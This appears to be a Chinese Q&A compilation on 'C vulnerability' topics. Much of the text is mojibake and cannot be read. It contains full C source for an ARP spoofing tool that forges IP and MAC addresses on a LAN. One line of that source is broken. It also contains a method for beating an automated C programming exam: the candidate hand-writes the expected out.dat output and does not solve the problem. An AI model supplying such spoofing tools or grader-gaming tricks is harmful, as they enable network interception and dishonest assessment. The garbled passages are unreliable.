c漏洞代碼示例

① 閿欒浠ｇ爜0xc00000鏄浠涔堟剰鎬濓紵

榪欎釜閿欒浠ｇ爜灝辨槸鎮㈠嶇郴緇熺殑鏃跺欙紝涓㈠け浜嗕竴浜涚郴緇熷紩瀵兼枃浠躲傚緩璁閲嶆柊瀹夎呯郴緇熴

寰杞疻INDOWS緋葷粺鐨勬紡媧

windows鎶婂唴瀛樺湴鍧0X00000000鍒0X0000ffff鎸囧畾涓哄垎閰峮ull鎸囬拡鐨勫湴鍧鑼冨洿錛屽傛灉紼嬪簭璇曞浘璁塊棶榪欎竴鍦板潃錛屽垯璁や負鏄閿欒銆俢/c++緙栧啓鐨勭▼搴忛氬父涓嶈繘琛屼弗鏍肩殑閿欒媯鏌ワ紝褰撻噰鐢╩alloc鏉ュ垎閰嶅唴瀛樿屽彲渚涘垎閰嶇殑鍦板潃絀洪棿涓嶅熺殑鎯呭喌涓嬭繑鍥瀗ull鎸囬拡銆

浣嗘槸浠ｇ爜涓嶆鏌ヨ繖縐嶉敊璇錛岃や負鍦板潃鍒嗛厤宸茬粡鎴愬姛錛屼簬鏄灝辮塊棶0X00000000鐨勫湴鍧錛屼簬鏄灝卞彂鐢熷唴瀛樿繚瑙勮塊棶錛屽悓鏃惰ヨ繘紼嬭緇堟銆

鎵╁睍璧勬枡錛

ASCII瀛楃﹀～鍏呯粍鎴愮殑pif鏂囦歡鏃朵細鍑虹幇浠ヤ笅鎯呭喌錛

涓涓闈炴硶鐨刾if鏂囦歡錛堢敤ascii瀛楃'x'濉鍏咃級鑷沖皯瑕369瀛楄妭錛岀郴緇熸墠璁や負鏄涓涓鍚堟硶鐨刾if鏂囦歡錛屾墠浼氫互pif鐨勫浘鏍嘯pifmgr.dll,0]鏄劇ず錛屾墠浼氬湪灞炴ч噷鏈夌▼搴忋佸瓧浣撱佸唴瀛樸佸睆騫曗濈瓑鍐呭廣

鑰屼笖浠呭綋涓涓闈瀙if鏂囦歡鐨勫ぇ灝忔槸369瀛楄妭鏃跺療鐪嬪睘鎬х殑鈥滅▼搴忊濋〉鏃訛紝涓嶄細鍙戠敓紼嬪簭閿欒錛屽綋瀵逛竴涓澶т簬369瀛楄妭鐨勯潪娉昿if鏂囦歡瀵熺湅灞炴х殑鈥滅▼搴忊濋〉鏃訛紝Explorer浼氬嚭閿欙紝鎻愮ず錛歕'***'鎸囦護寮曠敤鐨刓'***'鍐呭瓨銆傝ュ唴瀛樹笉鑳戒負'read'銆

② linux C編程， 如何仿造ip、mac地址發送報文呢 是利用ARP協議漏洞嗎有沒有源代碼借鑒下~~

一個arp欺騙攻擊的代碼如下：
/*
This program sends out ARP packet(s) with source/target IP
and Ethernet hardware addresses supplied by the user.
*/

#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <linux/if_ether.h>

#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
#define DEFAULT_DEVICE "eth0"
char usage[] = {"send_arp: sends out custom ARP packet. \n"
"usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};

struct arp_packet
{
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};

void die (char *);
void get_ip_addr (struct in_addr *, char *);
void get_hw_addr (char *, char *);

int main (int argc, char * argv[])
{
struct in_addr src_in_addr, targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
int j,number;
if (argc != 6)
die(usage);

sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));
if (sock < 0)
{
perror("socket");
exit(1);
}

number = atoi(argv[5]);

pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op = htons(OP_ARP_QUEST);
get_hw_addr(pkt.targ_hw_addr, argv[4]);
get_hw_addr(pkt.rcpt_hw_addr, argv[4]);
get_hw_addr(pkt.src_hw_addr, argv[2]);
get_hw_addr(pkt.sndr_hw_addr, argv[2]);
get_ip_addr(&src_in_addr, argv[1]);
get_ip_addr(&targ_in_addr, argv[3]);
memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data, DEFAULT_DEVICE);
for (j = 0; j < number; j++)
{
if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}
exit(0);
}

void die (char *str)
{
fprintf(stderr,"%s\n",str);
exit(1);
}

void get_ip_addr(struct in_addr *in_addr, char *str)
{
struct hostent *hostp;
in_addr->s_addr = inet_addr(str);
if(in_addr->s_addr == -1)
{
if ((hostp = gethostbyname(str)))
b(hostp->h_addr, in_addr, hostp->h_length);
else {
fprintf(stderr, "send_arp: unknown host %s\n", str);
exit(1);
}
}
}

void get_hw_addr (char *buf, char *str)
{
int i;
char c, val;
for(i = 0; i < ETH_HW_ADDR_LEN; i++)
{
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit(c))
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf = val << 4;
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit(c))
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf++ |= val;
if (*str == ':')
str++;
}
}

③ 璁＄畻鏈轟簩綰C璇璦鏈鍚庝竴閬撶紪紼嬮樻紡媧炴妧宸э紵鍝浣嶄翰錛岀煡閬撹阿璋㈠暒錛

鍘誨勾鐮旂┒榪囷紝鑰冨満涓婂ソ鍍忔垜涔熻佸埌閭ｄ釜涓滆タ鑳界敤浜嗭紝涓嶈繃榪樻槸鑷宸卞仛鐨勶紝鍏跺疄寰堢畝鍗曠殑錛屼笅闈㈡槸鎴戠殑涓綃囨棩蹇楋紝甯屾湜瀵逛綘鏈夌敤
浜岀駭c鐨勭▼搴忚捐￠樹綔寮婃柟娉
緗戜笂紕板埌鏈変簩綰c鐨勪綔寮婃柟娉曪紝鎻愬埌浜嗛氳繃鏇存敼out.dat鏂囦歡鐨勫唴瀹癸紝杈懼埌浣滃紛鐨勭洰鐨勶紝鑷宸變篃鍦ㄤ簩綰c璇璦鐨勬ā鎷熻冭瘯鐜澧冧笅嫻嬭瘯榪囷紝鍙鐢錛屾弧鍒嗭紝24鍒嗗氨鏉ヤ簡錛岃嚦浜庣湡姝ｇ殑浜岀駭c鑰冭瘯錛屾湁浜鴻磋兘鐢錛屼篃鏈変漢璇達紝涓嶈兘鐢錛屽彧鏈夎瘯璇曞氨鐭ラ亾浜嗭紝絎涓嬈¤冧簩綰э紝涔熸病璇曡繃錛屾墍浠ヤ笉鐭ラ亾鏄涓嶆槸鑳界敤
#include <stdio.h>
void fun(char p1[], char p2[])
{
}
main()
{ char s1[80], s2[40] ;void NONO ();
printf("Enter s1 and s2:\n") ;
scanf("%s%s", s1, s2) ;
printf("s1=%s\n", s1) ;
printf("s2=%s\n", s2) ;
printf("Invoke fun(s1,s2):\n") ;
fun(s1, s2) ;
printf("After invoking:\n") ;
printf("%s\n", s1) ;
NONO() ;
}
void NONO ()
{/* 鏈鍑芥暟鐢ㄤ簬鎵撳紑鏂囦歡錛岃緭鍏ユ祴璇曟暟鎹錛岃皟鐢╢un鍑芥暟錛岃緭鍑烘暟鎹錛屽叧闂鏂囦歡銆*/
int i ;
FILE *rf, *wf ;
char s1[80], s2[40] ;
rf = fopen("in.dat","r") ;
wf = fopen("out.dat","w") ;
for(i = 0 ; i < 10 ; i++) {
fscanf(rf, "%s", s1) ;
fscanf(rf, "%s", s2) ;
fun(s1, s2) ;
fprintf(wf, "%s\n", s1) ;
}
fclose(rf) ;
fclose(wf) ;
}

榪欎釜紼嬪簭鐨勫嚱鏁癴un鐨勫姛鑳芥槸榪炴帴瀛楃︿覆si鍜宻2鐨勶紝鐩存帴鐪嬭皟璇曠▼搴忕殑鏈鍚庝竴孌碉紝鎵撳紑浜嗕袱涓鏁版嵁嫻侊紝鐒跺悗浠庢枃浠秈n.dat鐨勯偅涓嫻佷腑錛岃誨嚭鏉ヤ簡s1鍜宻2瀛楃︿覆鐨勫唴瀹癸紝鍦ㄨ皟鐢ㄤ簡 fun鍑芥暟錛屽皢s2榪炴帴鍒皊1鐨勫悗闈錛屾渶鍚庡氨鏄灝嗚繛鎺ュソ鐨剆1杈撳嚭鍒皁ut.dat榪欎釜鏂囦歡涓
閭ｄ箞灝辨槸璇達紝鍙瑕佷綘鐨勭▼搴忔槸姝ｇ『鐨勶紝閭ｄ箞錛屼漢瀹剁殑嫻嬭瘯紼嬪簭鏈鍚庝細鍦╫ut.dat鍐欏嚭涓涓鐗瑰畾鐨勫唴瀹癸紝鍥犱負in.dat鏄鍥哄畾鐨
濡傛灉闃呭嵎鐪熺殑鏄浠呬粎媯嫻媜ut.dat 鐨勫唴瀹癸紝閭ｄ箞榪欑嶆柟娉曟槸鍙琛岀殑錛岃繖涓紼嬪簭鏄閫氳繃in.dat鍜宱ut.dat鏉ユ嫻嬬殑錛屽叿浣撶殑鎹㈠埆鐨勭▼搴忎篃鏄涓嶄竴瀹氱殑
鎵懼埌鑷宸辯殑鑰冭瘯鏂囦歡澶癸紝涓鑸浼氭湁鎻愮ず鐨勶紝榪涘幓涔嬪悗錛屼細鐪嬪埌in.dat鏂囦歡錛屽嶅埗in.dat灝嗗叾閲嶆柊鍛藉悕涓簅ut.dat鏂囦歡
鐒跺悗灝辨槸鎸夌収紼嬪簭鐨勬濊礬鏇存敼鏂囦歡鐨勫唴瀹逛簡

榪欎釜紼嬪簭鏄榪炴帴瀛楃︿覆鐨 錛屾墍浠ヨ偗瀹氭槸灝唅n.dat鐨勬煇浜涗笢瑗胯繛鎺ヤ簡鍦ㄨ緭鍑哄埌out銆俤at閲岄潰鍘諱簡

涓嬮潰鏄痠n.dat鏂囦歡鐨勫唴瀹癸紝瑕佺敤璁頒簨鏈鎵撳紑鎵嶈岋紝鎵撳紑鏂瑰紡鏇存敼

12345
67890
kjhjkhkjkl
kljkljkl
jkhjkhjkh
987689
kjhjkh
lmjnklj
sdsfsdfds
fsdfdsf
fsdfsdf
345234
423423
423423
7547dvgdf
5634
gdefgdf
tyerter
34563
565764
鎸夌収紼嬪簭鐨勮捐℃濊礬錛屾渶鍚庣殑紼嬪簭嫻嬭瘯闃舵碉紝鏄痜or寰鐜鍗佹★紝鐒跺悗姣忔¤誨彇涓よ岋紝榪炴帴鎴愪竴涓瀛楃︿覆涔嬪悗鍐嶅啓鍏out銆俻ut
榪欎箞鏈鍚庡氨鏄璋浜10嬈★紝鍏辨湁10琛
閭ｄ箞錛屽彧闇瑕佹妸錛12錛岃繛鎺ヤ竴璧鳳紝34錛岃繛鎺ヤ竴璧鳳紝榪欎釜紼嬪簭鐨刼ut.dat鏄涓嬮潰榪欐牱瀛楃殑錛岀粍鍚庯紝闃呭嵎錛岃繖閬撻樻槸婊″垎錛屽綋鐒舵槸妯℃嫙杞浠
1234567890

kjhjkhkjklkljkljkl
jkhjkhjkh987689
kjhjkhlmjnklj
sdsfsdfdsfsdfdsf
fsdfsdf345234
423423423423
7547dvgdf5634
gdefgdftyerter
34563565764
榪欎釜鏂規硶鍦ㄤ簩綰c涓嶄竴瀹氳兘鐢錛屼絾鏄澶氬皯浼氭湁鐐圭敤錛屼笉榪囪佽兘鐪嬫噦鏈鍚庢祴璇曠▼搴忕殑鍐呭癸紝渚濇嵁紼嬪簭鐨勫師鐞嗭紝鏂板緩鎴栬呮敼鏂囦歡
榪樻槸鏈夐庨櫓鐨勶紝閬囧埌鍙樻佽佸笀灝變笉濂借翠簡錛屽疄鍦ㄤ笉浼氬仛鐨勬椂鍊欐垨璁歌兘鐢ㄨ繖涓鏂規硶 銆